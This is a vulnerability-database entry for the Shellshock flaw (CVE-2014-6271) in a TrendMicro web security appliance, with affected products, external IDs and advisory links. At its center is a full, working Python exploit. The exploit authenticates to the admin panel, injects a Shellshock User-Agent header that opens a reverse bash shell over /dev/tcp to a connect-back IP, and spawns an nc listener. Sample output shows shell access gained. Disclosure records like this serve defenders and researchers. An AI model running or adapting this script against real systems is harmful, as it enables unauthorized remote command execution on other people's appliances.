Details of VAR-E-201409-0020

ID

VAR-E-201409-0020

CVE

cve_id:	CVE-2014-6271	Trust: 1.0
cve_id:	CVE-2014-6278	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 40619

EDB ID

40619

TITLE

TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection - Hardware remote Exploit

Trust: 1.0

sources: EXPLOIT-DB: 40619

DESCRIPTION

TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection. CVE-2014-6271 . remote exploit for Hardware platform

Trust: 1.0

sources: EXPLOIT-DB: 40619

AFFECTED PRODUCTS

vendor:	trendmicro	model:	interscan web security virtual appliance	scope:	-	version:	-	Trust: 1.0
vendor:	xerox	model:	workcentre	scope:	eq	version:	7245	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7242	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7238	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7235	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7232	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7228	Trust: 0.3
vendor:	xerox	model:	phaser	scope:	eq	version:	78000	Trust: 0.3
vendor:	xerox	model:	phaser	scope:	eq	version:	67000	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9393	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9303	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9302	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9301	Trust: 0.3
vendor:	ubuntu	model:	linux lts i386	scope:	eq	version:	12.04	Trust: 0.3
vendor:	ubuntu	model:	linux lts amd64	scope:	eq	version:	12.04	Trust: 0.3
vendor:	ubuntu	model:	linux sparc	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux powerpc	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux arm	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	10.04	Trust: 0.3
vendor:	sun	model:	solaris	scope:	eq	version:	11	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	3.2	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	3.1	Trust: 0.3
vendor:	oracle	model:	linux	scope:	eq	version:	5	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6.2	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	5	Trust: 0.3
vendor:	mcafee	model:	email gateway patch	scope:	eq	version:	7.01	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.0	Trust: 0.3
vendor:	mcafee	model:	email gateway hotfix	scope:	eq	version:	6.7.22	Trust: 0.3
vendor:	mcafee	model:	email gateway hotfix	scope:	eq	version:	6.7.21	Trust: 0.3
vendor:	ibm	model:	ds8000	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	7.1	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	6.1	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	5.3	Trust: 0.3
vendor:	hp	model:	insight control	scope:	eq	version:	0	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	4.2	Trust: 0.3
vendor:	gentoo	model:	linux	scope:	-	version:	-	Trust: 0.3
vendor:	cisco	model:	wide area application services	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified ip phone	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified contact center express	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	network analysis module	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	mds	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	gss 4492r global site selector	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	emergency responder	scope:	eq	version:	1.1	Trust: 0.3
vendor:	cisco	model:	digital media manager	scope:	eq	version:	5.0	Trust: 0.3
vendor:	cisco	model:	digital media manager	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	show and share	scope:	eq	version:	5(2)	Trust: 0.3
vendor:	avaya	model:	ip deskphone	scope:	eq	version:	96x16.2	Trust: 0.3
vendor:	avaya	model:	ip deskphone	scope:	eq	version:	96x16	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 40619

EXPLOIT

#!/usr/bin/env python
# TrendMicro InterScan Web Security Virtul Appliance
# ==================================================
# InterScan Web Security is a software virtual appliance that
# dynamically protects against the ever-growing flood of web
# threats at the Internet gateway exclusively designed to secure
# you against traditional and emerging web threats at the Internet
# gateway. The appliance however is shipped with a vulnerable
# version of Bash susceptible to shellshock (I know right?). An
# attacker can exploit this vulnerability by calling the CGI
# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited
# to perform arbitrary code execution. A limitation of this
# vulnerability is that the attacker must have credentials for
# the admin web interface to exploit this flaw. The panel runs
# over HTTP by default so a man-in-the-middle attack could be
# used to gain credentials and compromise the appliance.
#
# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1
# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit
# [-] Authenticating to '192.168.56.101' with 'admin' 'password'
# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA
# [-] exploiting shellshock CVE-2014-6271...
# bash: no job control in this shell
# bash-4.1$ id
# uid=498(iscan) gid=499(iscan) groups=499(iscan)
#
# -- Hacker Fantastic
#
# (https://www.myhackerhouse.com)
import requests
import sys
import os

def spawn_listener():
os.system("nc -l 8080")

def shellshock(ip,session,cbip):
user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}
cookies = {'JSESSIONID': session}
print "[-] exploiting shellshock CVE-2014-6271..."
myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)

def login_http(ip,user,password):
mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}
print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)
myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata)
session_cookie = myreq.history[0].cookies.get('JSESSIONID')
print "[-] JSESSIONID = %s" % session_cookie
return session_cookie

if __name__ == "__main__":
print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"
if len(sys.argv) < 5:
print "[-] use with <ip> <user> <pass> <connectback_ip>"
sys.exit()
newRef=os.fork()
if newRef==0:
spawn_listener()
else:
session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])
shellshock(sys.argv[1],session,sys.argv[4])

Trust: 1.0

sources: EXPLOIT-DB: 40619

EXPLOIT LANGUAGE

Trust: 1.0

sources: EXPLOIT-DB: 40619

PRICE

free

Trust: 1.0

sources: EXPLOIT-DB: 40619

TYPE

'Shellshock' Remote Command Injection

Trust: 1.0

sources: EXPLOIT-DB: 40619

CREDITS

Hacker Fantastic

Trust: 1.0

sources: EXPLOIT-DB: 40619

EXTERNAL IDS

db:	NVD	id:	CVE-2014-6271	Trust: 1.0
db:	EXPLOIT-DB	id:	40619	Trust: 1.0
db:	JUNIPER	id:	JSA10661	Trust: 0.3
db:	JUNIPER	id:	JSA10648	Trust: 0.3
db:	ICS CERT	id:	ICSA-14-269-01	Trust: 0.3
db:	CERT/CC	id:	VU#252743	Trust: 0.3
db:	MCAFEE	id:	SB10085	Trust: 0.3
db:	NVD	id:	CVE-2014-7169	Trust: 0.3
db:	NVD	id:	CVE-2014-6278	Trust: 0.3
db:	BID	id:	70166	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 40619

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2014-6271	Trust: 1.0
url:	https://github.com/hackerfantastic/public/blob/777a32d7277e778386e650632fdd9643f0d812ac/exploits/trendmicro_iwsva_shellshock.py	Trust: 1.0
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04540692	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004879	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685873	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685875	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21687971	Trust: 0.3
url:	http://www.gnu.org/software/bash/	Trust: 0.3
url:	http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096315	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04478866	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/1a2e5-5116a33c2fb27/cert_security_mini-_bulletin_xrx15k_for_77xx_r15-03_v1.0.pdf	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686433	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004898	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=isg3t1021279	Trust: 0.3
url:	https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04558068	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686246	Trust: 0.3
url:	https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_vulnerabilities_in_bash_affect_certain_qlogic_products_that_ibm_resells_for_bladecenter_and_flex_system_products_cve_2014_6271_c	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21685733	Trust: 0.3
url:	http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-372538.htm	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004905	Trust: 0.3
url:	http://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04561445	Trust: 0.3
url:	http://seclists.org/fulldisclosure/2014/oct/25	Trust: 0.3
url:	http://www.vmware.com/security/advisories/vmsa-2014-0010.html	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685673	Trust: 0.3
url:	https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_bash	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004982	Trust: 0.3
url:	http://www.fortiguard.com/advisory/fg-ir-14-030/	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21687079	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686445	Trust: 0.3
url:	http://seclists.org/bugtraq/2015/feb/77	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004928	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/29a7e-50e49f9c009f9/cert_security_mini_bulletin_xrx14g_for_77xx_v1.1.pdf	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471532	Trust: 0.3
url:	https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=&solutionid=sk102673	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21685541	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686479	Trust: 0.3
url:	https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04497042	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/bluu-9paps5	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479536	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479492	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=ssg1s1004903	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=nas8n1020272	Trust: 0.3
url:	https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04512907	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/bluu-9paptz	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004911	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2eeef-51056e459c6d8/cert_security_mini-_bulletin_xrx15h_for_p7800_v1_0.pdf	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479505	Trust: 0.3
url:	https://kc.mcafee.com/corporate/index?page=content&id=kb83017	Trust: 0.3
url:	http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html?ref=rss	Trust: 0.3
url:	http://lcamtuf.blogspot.in/2014/09/quick-notes-about-bash-bug-its-impact.html	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004915	Trust: 0.3
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10085	Trust: 0.3
url:	https://ics-cert.us-cert.gov/advisories/supplement-icsa-14-269-01	Trust: 0.3
url:	https://downloads.avaya.com/css/p8/documents/100183172	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04487573	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004945	Trust: 0.3
url:	http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096533	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=ssg1s1004932	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04488200	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479601	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685749	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2a901-510567b876a35/cert_security_mini-_bulletin_xrx15g_for_p6700_v1_0.pdf	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04497075	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479402	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685691	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686131	Trust: 0.3
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10661&cat=sirt_1&actp=list	Trust: 0.3
url:	http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140926-bash	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479398	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21686024	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2b8d8-513128526dd97/cert_security_mini-_bulletin_xrx15m_for_wc75xx_v1_1.pdf	Trust: 0.3
url:	http://seclists.org/bugtraq/2015/feb/76	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21685837	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=isg3t1021272	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/bluu-9paptm	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/1a7a1-50f12e334b734/cert_security_mini-_bulletin_xrx14h_for_wc59xx_v1.pdf	Trust: 0.3
url:	https://lists.gnu.org/archive/html/bug-bash/2014-10/msg00040.html	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2a20e-5105457a515cc/cert_security_mini-_bulletin_xrx15e_for_wc57xx_v1_0.pdf	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004897	Trust: 0.3
url:	http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-377648.htm	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004933	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686037	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04496383	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21686098	Trust: 0.3
url:	http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096503	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04487558	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=isg3t1021361	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471546	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21686132	Trust: 0.3
url:	http://lcamtuf.blogspot.de/2014/09/bash-bug-apply-unofficial-patch-now.html	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471538	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685914	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685604	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04475942	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2df3c-51055b159fd50/cert_security_mini_bulletin_xrx15f_for_connectkey_1.5_v1-01.pdf	Trust: 0.3
url:	https://downloads.avaya.com/css/p8/documents/100183088	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686171	Trust: 0.3
url:	http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.html	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686494	Trust: 0.3
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10648	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 40619

SOURCES

db:	BID	id:	70166
db:	EXPLOIT-DB	id:	40619

LAST UPDATE DATE

2023-05-30T10:41:05.751000+00:00

SOURCES UPDATE DATE

db:

BID

id:

70166

date:

2016-07-05T21:53:00

SOURCES RELEASE DATE

db:	BID	id:	70166	date:	2014-09-27T00:00:00
db:	EXPLOIT-DB	id:	40619	date:	2016-10-21T00:00:00